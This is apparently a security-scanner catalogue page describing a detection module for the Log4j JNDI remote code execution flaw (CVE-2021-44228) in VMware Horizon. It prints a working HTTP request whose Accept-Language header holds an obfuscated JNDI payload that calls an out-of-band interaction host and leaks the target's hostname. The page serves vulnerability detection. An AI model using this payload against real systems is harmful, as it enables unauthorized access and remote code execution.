Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

VMware Horizon - JNDI Remote Code Execution (Apache Log4j)

By kannthu

Critical
Vidoc logoVidoc Module
#cve#cve2021#rce#jndi#log4j
Description

What is the "VMware Horizon - JNDI Remote Code Execution (Apache Log4j)" module?

The "VMware Horizon - JNDI Remote Code Execution (Apache Log4j)" module is a test case designed to detect the vulnerability in VMware Horizon that allows remote code execution through the Apache Log4j framework. This vulnerability, identified as CVE-2021-44228, has a critical severity level and can be exploited by attackers to execute malware and obtain sensitive information.

This module was authored by johnk3r.

Impact

If successfully exploited, the vulnerability in VMware Horizon can have severe consequences. Attackers can execute arbitrary code on the affected system, leading to potential data breaches, unauthorized access, and system compromise. This can result in significant financial and reputational damage for organizations using VMware Horizon.

How does the module work?

The module works by sending an HTTP request template to the target system. The request is designed to exploit the vulnerability by leveraging the JNDI (Java Naming and Directory Interface) feature in Apache Log4j. The module uses a specific payload in the request to trigger the remote code execution.

Here is an example of the HTTP request:

GET /portal/info.jsp HTTP/1.1
Host: <Hostname>
Accept-Language: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{%InteractionURL%}}

The module also includes matching conditions to determine if the vulnerability is present. It checks for the presence of the "dns" protocol in the interaction and matches the request against a regular expression pattern.

By running this module, organizations can identify if their VMware Horizon installation is vulnerable to the JNDI Remote Code Execution (Apache Log4j) exploit and take appropriate measures to mitigate the risk.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dnsand
regex: ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-...
Passive global matcher
No matching conditions.
On match action
Report vulnerability